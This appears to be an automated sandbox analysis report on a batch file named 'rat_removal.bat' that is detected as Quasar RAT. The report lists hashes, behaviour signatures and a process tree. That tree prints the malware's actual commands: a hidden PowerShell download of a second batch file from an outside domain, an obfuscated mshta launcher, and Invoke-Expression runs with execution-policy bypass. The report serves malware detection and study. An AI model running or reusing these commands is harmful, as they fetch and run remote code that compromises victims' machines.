Analysis
-
max time kernel
49s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
14/03/2024, 05:24
Static task
static1
Behavioral task
behavioral1
Sample
rat_removal.bat
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
rat_removal.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
rat_removal.bat
Resource
win11-20240214-en
General
-
Target
rat_removal.bat
-
Size
14KB
-
MD5
2c0ee080298d0de1320e6e7eda4ca39b
-
SHA1
edd03f96d4f4277a24e541376fdddf43439b4a99
-
SHA256
7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e
-
SHA512
ffdfd43eb46107be849d3e1938d1db0be87d27700799a9f31527b512abaca615241c6ee2d6358061d5ea133233aa0edda9908091419c024977b25365064d9e64
-
SSDEEP
192:HbKSAmk7b/FQASmmZrQCgljChA4DW0JyquFnpUoH:H28k7b/hkQCgljwAEbyvFpL
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/1432-109-0x000002777AED0000-0x000002777B67E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 1812 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 3 IoCs
pid Process 3484 $sxr-mshta.exe 436 $sxr-cmd.exe 1432 $sxr-powershell.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1812 powershell.exe 1812 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 1432 $sxr-powershell.exe 1432 $sxr-powershell.exe 1432 $sxr-powershell.exe 1432 $sxr-powershell.exe 1432 $sxr-powershell.exe 1432 $sxr-powershell.exe 1432 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 1432 $sxr-powershell.exe Token: SeDebugPrivilege 1432 $sxr-powershell.exe Token: SeDebugPrivilege 1432 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4104 wrote to memory of 5052 4104 cmd.exe 89 PID 4104 wrote to memory of 5052 4104 cmd.exe 89 PID 4104 wrote to memory of 3196 4104 cmd.exe 90 PID 4104 wrote to memory of 3196 4104 cmd.exe 90 PID 4104 wrote to memory of 4908 4104 cmd.exe 91 PID 4104 wrote to memory of 4908 4104 cmd.exe 91 PID 4104 wrote to memory of 2092 4104 cmd.exe 92 PID 4104 wrote to memory of 2092 4104 cmd.exe 92 PID 4104 wrote to memory of 3360 4104 cmd.exe 93 PID 4104 wrote to memory of 3360 4104 cmd.exe 93 PID 4104 wrote to memory of 2520 4104 cmd.exe 94 PID 4104 wrote to memory of 2520 4104 cmd.exe 94 PID 4104 wrote to memory of 2060 4104 cmd.exe 95 PID 4104 wrote to memory of 2060 4104 cmd.exe 95 PID 4104 wrote to memory of 1036 4104 cmd.exe 96 PID 4104 wrote to memory of 1036 4104 cmd.exe 96 PID 4104 wrote to memory of 1800 4104 cmd.exe 97 PID 4104 wrote to memory of 1800 4104 cmd.exe 97 PID 4104 wrote to memory of 1812 4104 cmd.exe 98 PID 4104 wrote to memory of 1812 4104 cmd.exe 98 PID 4104 wrote to memory of 1280 4104 cmd.exe 111 PID 4104 wrote to memory of 1280 4104 cmd.exe 111 PID 1280 wrote to memory of 2660 1280 cmd.exe 112 PID 1280 wrote to memory of 2660 1280 cmd.exe 112 PID 1280 wrote to memory of 4504 1280 cmd.exe 113 PID 1280 wrote to memory of 4504 1280 cmd.exe 113 PID 3484 wrote to memory of 436 3484 $sxr-mshta.exe 117 PID 3484 wrote to memory of 436 3484 $sxr-mshta.exe 117 PID 436 wrote to memory of 3516 436 $sxr-cmd.exe 119 PID 436 wrote to memory of 3516 436 $sxr-cmd.exe 119 PID 436 wrote to memory of 1432 436 $sxr-cmd.exe 120 PID 436 wrote to memory of 1432 436 $sxr-cmd.exe 120 PID 1432 wrote to memory of 680 1432 $sxr-powershell.exe 7 PID 1432 wrote to memory of 680 1432 $sxr-powershell.exe 7 PID 1432 wrote to memory of 968 1432 $sxr-powershell.exe 12 PID 1432 wrote to memory of 968 1432 $sxr-powershell.exe 12 PID 1432 wrote to memory of 432 1432 $sxr-powershell.exe 14 PID 1432 wrote to memory of 432 1432 $sxr-powershell.exe 14 PID 1432 wrote to memory of 528 1432 $sxr-powershell.exe 16 PID 1432 wrote to memory of 528 1432 $sxr-powershell.exe 16 PID 1432 wrote to memory of 1084 1432 $sxr-powershell.exe 17 PID 1432 wrote to memory of 1084 1432 $sxr-powershell.exe 17 PID 1432 wrote to memory of 1092 1432 $sxr-powershell.exe 18 PID 1432 wrote to memory of 1092 1432 $sxr-powershell.exe 18 PID 1432 wrote to memory of 1100 1432 $sxr-powershell.exe 19 PID 1432 wrote to memory of 1100 1432 $sxr-powershell.exe 19 PID 1432 wrote to memory of 1208 1432 $sxr-powershell.exe 21 PID 1432 wrote to memory of 1208 1432 $sxr-powershell.exe 21 PID 1432 wrote to memory of 1272 1432 $sxr-powershell.exe 22 PID 1432 wrote to memory of 1272 1432 $sxr-powershell.exe 22 PID 1432 wrote to memory of 1328 1432 $sxr-powershell.exe 23 PID 1432 wrote to memory of 1328 1432 $sxr-powershell.exe 23 PID 1432 wrote to memory of 1356 1432 $sxr-powershell.exe 24 PID 1432 wrote to memory of 1356 1432 $sxr-powershell.exe 24 PID 1432 wrote to memory of 1396 1432 $sxr-powershell.exe 25 PID 1432 wrote to memory of 1396 1432 $sxr-powershell.exe 25 PID 1432 wrote to memory of 1504 1432 $sxr-powershell.exe 26 PID 1432 wrote to memory of 1504 1432 $sxr-powershell.exe 26 PID 1432 wrote to memory of 1596 1432 $sxr-powershell.exe 27 PID 1432 wrote to memory of 1596 1432 $sxr-powershell.exe 27 PID 1432 wrote to memory of 1604 1432 $sxr-powershell.exe 28 PID 1432 wrote to memory of 1604 1432 $sxr-powershell.exe 28 PID 1432 wrote to memory of 1684 1432 $sxr-powershell.exe 29 PID 1432 wrote to memory of 1684 1432 $sxr-powershell.exe 29 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1100
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:TlctmzlD=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:TlctmzlD=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:YukCfVmozO; "4⤵PID:3516
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2096
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2200
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\chcp.comchcp.com 4372⤵PID:5052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:3196
-
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:4908
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:2092
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:3360
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat2⤵PID:2520
-
-
C:\Windows\system32\find.exefind2⤵PID:2060
-
-
C:\Windows\system32\find.exefind2⤵PID:1036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:1800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "3⤵PID:2660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
8.4MB
MD57a98c3b9846bfac750cb9ecb4c92e06e
SHA1547f1300c41c50658c7ef4530de478992d6b4f5e
SHA25663422f3ad2d7ede071a78fe768d32af2143d384ad469be3ce4495450e99518c3
SHA51261394ba7135a42c8a7c224cc09811a6e29ec9e84ceaeaea6352021ccea251e93f96983b44cd8072d36915d3b2c52316804dd2e609afa108619fdf2139bd2e0ac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b